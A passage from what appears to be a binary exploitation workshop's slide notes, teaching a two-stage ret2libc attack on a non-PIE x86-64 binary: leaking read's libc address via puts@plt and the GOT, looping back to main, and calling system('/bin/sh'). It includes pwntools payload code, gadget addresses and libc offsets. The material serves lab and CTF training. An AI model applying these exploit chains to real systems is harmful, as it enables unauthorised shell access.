address of the libc in advance.
What you can also see here is that in this example the text section of our program got
randomized too.
A binary that is built this way is called a “position independent executable” (PIE).
Folie 70
If PIE is enabled, even the addresses of all ROP gadgets change, and this makes exploitation
really hard.
However, PIE is not always enabled for a program, and we can check this with gdb-peda, for
example.
Folie 71
If PIE is disabled, the text section always starts at the same address.
To show that this configuration is still relevant, you can try this on some of the standard
utilities of Ubuntu 16.04, for example the ping command:
The base address of the libc changes with every execution of the command.
Yet the last 3 nibbles are always zero!
That is because base addresses of sections are always page aligned.
(If you think you have found the libc base address but it does not end with 3 zeros, you made a
mistake).
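The page-alignment check can be written down as a tiny sanity test for your exploit script. This is only a sketch: the helper name `looks_like_libc_base` is made up for this illustration, and it assumes a page size of 0x1000 bytes, which is the usual value on x86-64 Linux. The two example values are derived from the addresses shown on the GOT/PLT slides later on.

```python
PAGE_SIZE = 0x1000  # assumption: 4 KiB pages, the usual size on x86-64 Linux


def looks_like_libc_base(address):
    """Return True if the address is page aligned (its last 3 nibbles are zero)."""
    return address % PAGE_SIZE == 0


if __name__ == "__main__":
    # A candidate base ending in 000 passes the check ...
    print(looks_like_libc_base(0x7fa5b61f2000))
    # ... while the address of a function inside the libc does not.
    print(looks_like_libc_base(0x7fa5b62e9250))
```

Passing this check does not prove that the address is correct, it only catches the most common calculation mistakes early.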
Before we start, one important note: gdb disables ASLR for the debugged program by default!
If your exploit works in gdb, and does not work outside of it, and ASLR is enabled on the
system, that is probably the reason why.
If you want to enable ASLR in gdb, peda provides a command for it: “aslr on”
We see that PIE is disabled. This means that the code sections of the program, the three
sections that are highlighted in black, stay at the same address with every execution of the
program.
All other base addresses of the sections are randomized due to ASLR.
What are the difficulties now? What prevents our last exploit from working in this environment?
- We can overwrite RIP, but we don’t know where to jump (we don’t know where
the libc base is located)
- We want to do the exact same thing as before, but first we need to get the libc base
address
- We know that PIE is disabled, so the addresses inside our binary don’t change
- That means we can still use any gadgets in our program ➔ very good!
- We will see that these gadgets are enough to leak an address of the libc, which largely
defeats ASLR when PIE is disabled.
- What we basically want is to build a ROP chain that leaks the address of the libc. Maybe we find
a smart way to do this by looking at what we’ve got.
The first step is the leak: our program uses functions that are defined in the libc, like printf
or read, so the program has to know where to find them.
The second step is a pretty neat trick: maybe we find a code snippet that lets
us trigger the buffer overflow again during the same execution,
so that we can exploit the same buffer overflow a second time. This will become clearer in just a
second. The third step is to perform the known exploit with the newly calculated addresses of
system and “/bin/sh”.
Let’s look at how we would do the second step: triggering the buffer overflow again.
The buffer overflow happens in the call to read, so we could jump to an address
before that call to get the buffer overflow a second time.
But we have to be careful which one we choose, because the base pointer (RBP) still needs to
be valid at that point.
The easiest way to get the buffer overflow again is to jump to a point where everything gets set
up, usually the beginning of a function; here it is the beginning of the main function.
We succeeded: we could jump back and get the buffer overflow again.
So step 2 and step 3 should be clear now: I just showed how to loop back to main to get another
buffer overflow, and step 3, calculating the addresses of system and “/bin/sh” once we
have the libc base address, is doable too.
So the only part left is the leak and we can explore this now in detail. For this, we will have a
look at the Global Offset Table and Procedure Linkage Table.
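Folie 73
GOT and PLT
• Every library function that is called from inside the binary has a corresponding entry in those tables
[Slide diagram: memory layout from 0x400000 up to 0x7FFF… with .plt, .text, libc and stack. .text contains "call puts@plt"; .plt contains "puts: jmp [puts@GOT]" and "read: jmp [read@GOT]". RIP is in .text, just before the call.]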
When the instruction pointer reaches a call to a library function, it does not call directly into
the shared library.
Folie 75
GOT and PLT
[Slide diagram: GOT and PLT layout; RIP is at "call puts@plt" in .text]
As you can see it actually calls into the PLT section at the entry of puts.
Folie 76
GOT and PLT
[Slide diagram: GOT and PLT layout; RIP is at "puts: jmp [puts@GOT]" in .plt]
The global offset table contains the absolute addresses of all library functions that are used
inside the binary.
This table is dynamically created at runtime, because these addresses change for every
execution due to ASLR.
Folie 78
GOT and PLT
[Slide diagram: GOT and PLT layout with .plt, .text, libc and stack]
And when we reach the ret instruction, we return to the text section, right after the initial call
to puts.
Folie 80
GOT and PLT
[Slide diagram: GOT and PLT layout; RIP is in .text, just after "call puts@plt"]
And that’s it, that’s how library functions get called with the help of the Global Offset Table
and the Procedure Linkage Table.
Now what does that mean for us as attackers?
Folie 81
GOT and PLT
• .got, .text and .plt: not randomized if not compiled as PIE
[Slide diagram: libc contains puts at 0x7fa5b6261690. .got holds "puts: 0x7fa5b6261690" and "read: 0x7fa5b62e9250". .text contains "call puts@plt"; .plt contains "puts: jmp [puts@GOT]" and "read: jmp [read@GOT]". The layout spans 0x400000 to 0x7FFF….]
These 3 sections, GOT, text and PLT are not randomized if the binary was not compiled as
Position Independent Executable.
We can abuse this to our advantage.
We already used gadgets from the text section in our last exercise.
All the entries of the PLT are great gadgets, because they represent functions in the libc
which we can use without knowing the base address of the libc.
So in our case, for example the puts function is interesting, because we can use it to leak
information from the process.
puts takes an address as its only argument and prints the bytes stored at this address to
stdout, up to the first null byte.
This is our leak gadget. Let’s look it up in Hopper.
(Hopper -> File -> Read Executable to Disassemble -> 03_demo_ASLR):
You can click on the main function in the list of labels on the left.
Here we have our binary again, and the three functions we are calling.
puts to print “Give me the Code”, read to read data from the user and printf to print the
given data.
When you look at the functions that are called, the call target is not “puts” directly but j_puts, which
stands for “jump puts”, and it is still located inside the binary. When we hover over it, we
see its address at 0x4XXXXX, which is close to the text segment.
Let’s follow the reference by clicking on j_puts.
It brings us to the entry of puts in the PLT!
This address here (0x400470) is the address of our leak gadget, because it will directly jump
to puts in the libc when called from anywhere inside the binary.
Let’s keep that in mind.
As I explained, all the entries in the PLT are trampoline functions. The program comes here to
look up the address of puts in the Global Offset Table and jumps to it.
However, if you look at the GOT now, you don’t see actual addresses. You see initializer values:
(The values on the right side, like the one highlighted in yellow, are initializer values)
But after the first call to a function, its value gets updated and holds the actual address of
the function in the libc.
We can check that with gdb. We know that the entry of puts@GOT is at 0x601018.
We set a breakpoint after puts is called, run the program and look at the memory of
0x601018:
We see that the value stored at 0x601018 is now in a very different range; this is the
range for dynamic libraries. We also see that the entry of read@GOT at 0x601028 still holds an
initializer value, because the function did not get called yet.
We now know that during the execution the values in the GOT get updated and hold the
actual addresses of the functions in the libc.
So we can take one of these GOT entries, for example read@GOT
(0x601028), and give it to puts as an argument in order to print the libc address of read
as our leak of the libc.
Folie 82
GOT and PLT
[Slide diagram: libc contains puts at 0x7fa5b6261690 and read at 0x7fa5b62e9250. .got holds "puts: 0x7fa5b6261690" and "read: 0x7fa5b62e9250". .text contains "call puts@plt"; .plt contains "puts: jmp [puts@GOT]" and "read: jmp [read@GOT]".]
These entries in the GOT make a good target for leaking information, because if we learn
such an address, and we know which function it belongs to, we can recalculate the base
address of the libc.
Folie 83
GOT and PLT
libcbase = [leaked address] - OFFSET
libcbase = 0x7fa5b62e9250 - OFFSET
[Slide diagram: OFFSET is the distance between the libc base and read (0x7fa5b62e9250) inside the libc. .got holds "puts: 0x7fa5b6261690" and "read: 0x7fa5b62e9250"; .text contains "call puts@plt"; .plt contains "puts: jmp [puts@GOT]" and "read: jmp [read@GOT]".]
Like this.
We have now learned that the entries in the PLT can be useful leak gadgets for our ROP chain, because they
let us call the function without knowing the libc base address.
Entries in the GOT can be great leak targets, because if we learn such an address, we can
recalculate the libc base address and then do everything we want (e.g. popping a
shell)!
Folie 84
RDI: [read@got]
RIP: puts@plt
To summarize:
In our ROP chain we want to call the puts function with the entry of read in the GOT as the
argument.
This will print the address of the read function inside the libc, and therefore we have a leak of
an absolute libc address.
To do that, we need to put the address of read@GOT into RDI. This way it will serve as the
function argument.
And then we need to jump to the puts trampoline function inside the PLT.
Let’s implement that in our exploit script.
(open exploit.py in the folder of the third demo)
It starts with the usual values. If you scroll down, you see that this script is a bit different: it interacts with
the program:
The script is divided into steps and each step has a little description.
After a step is completed you can uncomment the next step.
This way you can always check whether your script still works, and if not, you know where to look.
So if you already have ideas how to do it, I strongly encourage you to try it on your own first
for a few minutes and come back to the following detailed description afterwards.
# STEP 1: FILLBUF
FILLBUF = 40
# STEP 2: extract offsets to 'system' and '/bin/sh' and 'read' from libc
Before we determine the offsets inside the libc, we look up which libc is loaded.
We find the offsets like before, but this time we also need to find the offset of our leak target read.
When you grep for “read” you will get many results. We see that all the function names end with an @,
so we can include the @ in our search to filter better.
OFFSET_SYSTEM = 0x45390
OFFSET_BIN_SH = 0x18cd57
OFFSET_READ = 0xf7250 #offset in libc to the function we leak
PUTS_PLT:
We can follow the reference of j_puts in the main function to get to the PLT entry of puts:
(You can find the PLT also with the menu Navigate -> Show Section List -> search for ‘plt’)
MAIN_FUNC: The address of the main function (to trigger the buffer overflow again):
POP_RDI = 0x400673
PUTS_PLT = 0x400470 # address of 'puts' in PLT
MAIN_FUNC = 0x4005b6 # address of 'main' function of binary
We can find the read@GOT entry (0x601028, as seen in gdb above) by following the reference in the main function to the PLT and from
there to the GOT:
(You can find the GOT also with the menu Navigate -> Show Section List -> search for ‘got’)
Now we have all the components we need for the first stage.
# STEP 5: build ROP-chain to leak the address of read from the GOT.
# Finished by jumping back to the main-function
So first we need the POP RDI gadget to get the address of read@GOT into RDI.
Then we need the value that gets popped into RDI, the address of read@GOT
payload = "A" * FILLBUF
payload += p64(POP_RDI)
payload += p64(READ_AT_GOT)
After we get the leak we want to jump back to the main function:
payload = "A" * FILLBUF
payload += p64(POP_RDI)
payload += p64(READ_AT_GOT)
payload += p64(PUTS_PLT)
payload += p64(MAIN_FUNC)
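If you want to inspect the first-stage payload without pwntools, the same byte string can be sketched with the standard library only. This is an illustration, not the workshop's exploit.py: it is written for Python 3 (hence the bytes literals), `struct.pack("<Q", …)` stands in for `p64()`, the function name `build_leak_payload` is made up, and READ_AT_GOT = 0x601028 is the value we saw in gdb above.

```python
import struct

FILLBUF = 40             # padding up to the saved return address
POP_RDI = 0x400673       # "pop rdi; ret" gadget
READ_AT_GOT = 0x601028   # GOT entry of read (value seen in gdb above)
PUTS_PLT = 0x400470      # PLT entry of puts
MAIN_FUNC = 0x4005b6     # start of the main function


def p64(value):
    """Pack an integer as 8 little-endian bytes (stand-in for pwntools' p64)."""
    return struct.pack("<Q", value)


def build_leak_payload():
    """Stage 1: call puts(read@GOT), then return to main."""
    payload = b"A" * FILLBUF
    payload += p64(POP_RDI)      # ret jumps here and pops the next value into RDI
    payload += p64(READ_AT_GOT)  # the argument for puts
    payload += p64(PUTS_PLT)     # prints the bytes stored at read@GOT
    payload += p64(MAIN_FUNC)    # puts returns here, so we can overflow again
    return payload


if __name__ == "__main__":
    print(build_leak_payload().hex())
```

Printing the hex form makes it easy to compare the layout with what you see on the stack in gdb: 40 filler bytes followed by four 8-byte values in little endian.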
The following lines in the script are already given and manage the interaction between us and
the program.
r.recvuntil("Give me the Code: ")
r.sendline(payload)
r.recvuntil("You gave me: ")
leak = r.recvuntil("Give me the Code:")
log.info("PAYLOAD: " + payload.encode("hex"))
log.info("LEAK : " + leak.encode("hex"))
We receive the line that asks for the code, then we send our payload. We know that before the program
mirrors back our input it prints “You gave me: ”, which we do not want to save.
Then we save everything between this and the next “Give me the Code:” (which only appears
a second time because we jumped back to main) as our leak.
# STEP 6: execute exploit to get a leak from the binary and analyse it
Somewhere in the leak we need to find the address of read in the libc!
We know the last 3 nibbles of the address, because the libc base address always ends
with 000. The offset of read inside the libc is 0xf7250, so the last 3 nibbles need to be
250.
Because the addresses appear in little endian, we look for a pattern like this: 50 ?2
Now that we found it, we need to count the symbols before the address and strip them away.
The following 6 bytes are our libc address (you might expect 8 bytes for 64 bit, but the two most
significant bytes of a 64-bit user-space address are null bytes, and puts stops printing at the first null byte).
To count the symbols before our leak, I just copied the characters before it into a text editor and
marked them, because I am lazy (and I wanted to keep the script short).
But we need to remember that we want the number of bytes, while we printed hex digits.
So we need to divide the result by two:
offset_of_read_address_in_leak = 58 // 2
Next in the script there are lines to extract the address of read in the libc from the leak.
Then it converts the bytestring into a valid address with u64().
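If you do not want to count characters by hand, the search for the pattern “50 ?2” and the conversion can be sketched like this. Again, this is only an illustration under assumptions: it is Python 3 with the standard library (`struct.unpack("<Q", …)` stands in for `u64()`), the helper names `find_leak_offset` and `extract_address` are made up, and the sample leak in the demo is synthetic data built from the address on the slides.

```python
import struct


def find_leak_offset(leak, low12):
    """Return the first index where two bytes match the low 12 bits of an address.

    In little endian the lowest byte comes first, so for 0x250 we look for
    0x50 followed by a byte whose low nibble is 0x2 (the pattern "50 ?2").
    Returns -1 if nothing matches.
    """
    low_byte = low12 & 0xFF
    third_nibble = (low12 >> 8) & 0xF
    for i in range(len(leak) - 1):
        if leak[i] == low_byte and (leak[i + 1] & 0xF) == third_nibble:
            return i
    return -1


def extract_address(leak, offset):
    """Take the 6 printed bytes at offset, pad to 8 bytes, unpack as little endian."""
    raw = leak[offset:offset + 6]
    return struct.unpack("<Q", raw.ljust(8, b"\x00"))[0]


if __name__ == "__main__":
    # Synthetic leak for illustration: 29 filler bytes, then the 6 address bytes.
    sample = b"A" * 29 + struct.pack("<Q", 0x7fa5b62e9250)[:6] + b"\nGive me the Code:"
    offset = find_leak_offset(sample, 0x250)
    print(offset, hex(extract_address(sample, offset)))
```

The two-byte pattern can also match by accident somewhere else in the leak, so still check that the result looks like an address from the range of dynamic libraries.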
We can run the script until Step 7 now.
This looks good, the address of read that we extracted looks like an address from the range
of dynamic libraries and it ends with 250. We can continue.
# STEP 8: recalculate the libc base address and the addresses of system and '/bin/sh'
We know the address of read, and the offset of read to the libc base.
This means we can recalculate the libc base address!
Now that we have the libc base address again, we can calculate the addresses of system and ‘/bin/sh’:
address_system = libc_base + OFFSET_SYSTEM
address_bin_sh = libc_base + OFFSET_BIN_SH
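As a worked example of this arithmetic, here is a small sketch that uses the address of read shown on the GOT/PLT slides (0x7fa5b62e9250) together with the offsets from step 2. The function name `resolve_addresses` is made up for this illustration, and your leaked address will of course differ on every run.

```python
OFFSET_SYSTEM = 0x45390
OFFSET_BIN_SH = 0x18cd57
OFFSET_READ = 0xf7250  # offset in libc to the function we leak


def resolve_addresses(address_read):
    """Recalculate the libc base and the addresses of system and '/bin/sh'."""
    libc_base = address_read - OFFSET_READ
    if libc_base & 0xFFF:
        # A libc base must be page aligned, otherwise leak or offset is wrong.
        raise ValueError("libc base does not end with 000")
    return {
        "libc_base": libc_base,
        "system": libc_base + OFFSET_SYSTEM,
        "bin_sh": libc_base + OFFSET_BIN_SH,
    }


if __name__ == "__main__":
    for name, value in resolve_addresses(0x7fa5b62e9250).items():
        print(name, hex(value))
```

For the slide value this gives a libc base of 0x7fa5b61f2000, system at 0x7fa5b6237390 and “/bin/sh” at 0x7fa5b637ed57.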
Running the script shows that the values we calculated seem good: the libc base address
ends with 000, all the other offsets are fine too.
# STEP 9: Profit
Now that we have the libc base address again, we can assemble the payload just as we are
used to. Get the address to the string ‘/bin/sh’ in RDI, and call system.
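The second-stage payload has the same shape as in the earlier exercises. A minimal sketch with the standard library only, assuming Python 3 and the same FILLBUF and POP_RDI values as in the first stage; the function name `build_shell_payload` is made up, and the example addresses in the demo are the ones calculated from the slide values, not values you will see on your machine.

```python
import struct

FILLBUF = 40        # padding up to the saved return address
POP_RDI = 0x400673  # "pop rdi; ret" gadget inside the binary


def build_shell_payload(address_bin_sh, address_system):
    """Stage 2: put the address of '/bin/sh' into RDI, then call system."""
    payload = b"A" * FILLBUF
    payload += struct.pack("<Q", POP_RDI)         # pops the next value into RDI
    payload += struct.pack("<Q", address_bin_sh)  # argument for system
    payload += struct.pack("<Q", address_system)  # the gadget's ret jumps to system
    return payload


if __name__ == "__main__":
    print(build_shell_payload(0x7fa5b637ed57, 0x7fa5b6237390).hex())
```

In the real script you send this payload after the second “Give me the Code:” prompt and then switch to interactive mode.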
… that you can attach gdb to your pwntools script, which is sometimes pretty handy?
… to connect with a remote target you can use the template from the third example and you only
need to specify ip address and port in the execution command? (e.g. ./exploit.py 1.2.3.4 4444)
… that ropper has a chain generator, that automatically generates ROP chains that might work in
some cases? (The binaries from the course are too small unfortunately, the bigger the programs the
more ROP gadgets) (and ropper in general is a very nice tool)
Training:
https://picoctf.com/ (binaries in higher levels are a good exercise!)
https://ringzer0ctf.com (Linux pwnage – the important ones are online)
https://github.com/RPISEC/MBE (RPI-sec, lab 07)
overthewire
Every CTF is a good exercise ;)
(to train this specifically, junior variants are also a good option, e.g. 35C3 Junior CTF)
… These channels and trainings were both my practice and my source of knowledge.
They serve as a reference and a heartfelt recommendation.